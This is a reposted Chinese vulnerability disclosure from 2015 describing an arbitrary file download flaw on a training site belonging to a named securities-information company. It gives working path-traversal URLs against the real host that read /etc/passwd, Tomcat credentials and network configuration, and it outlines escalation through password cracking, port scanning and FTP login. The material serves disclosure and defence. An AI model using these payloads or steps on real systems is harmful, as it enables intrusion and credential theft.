记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

上海大智慧某网站任意文件下载到系统权限

2015-05-23 05:35
漏洞标题 上海大智慧某网站任意文件下载到系统权限
相关厂商 上海大智慧
漏洞作者 Tea
提交时间 2015-04-05 22:51
公开时间 2015-05-22 13:12
漏洞类型 任意文件遍历/下载
危害等级
自评Rank 20
漏洞状态 厂商已经确认
Tags标签

漏洞详情

任意文件下载:

http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/passwd&name=c

或者:

http://pub.px.gw.com.cn/training/down.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/passwd&name=c

http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../opt/apache-tomcat-7.0.8/tomcat-users.xml&name=c

http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0&name=c

测试步骤:

首先下载了passwd文件–>尝试下载影子文件–>破解其中的密码–>找真实IP(下载/ifcfg-eth0文件)–>扫描端口–>发现FTP服务(21Port)–>登录FTP–>获取全目录权限–>未上传下载任意文件(测试结果)

漏洞证明:

以下为测试结果的截图:

文件下载

GW11.jpg

FTP登录(未尝试上传WEBSHELL)

PW12.jpg

PW13.jpg

修复方案:

任意文件下载先修好~~密码再改改。

版权声明:转载请注明来源 Tea@乌云

转载请注明:安全脉搏 » 上海大智慧某网站任意文件下载到系统权限

知识来源: www.secpulse.com/archives/32085.html
想收藏或者和大家分享这篇好文章→复制链接地址

“上海大智慧某网站任意文件下载到系统权限”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云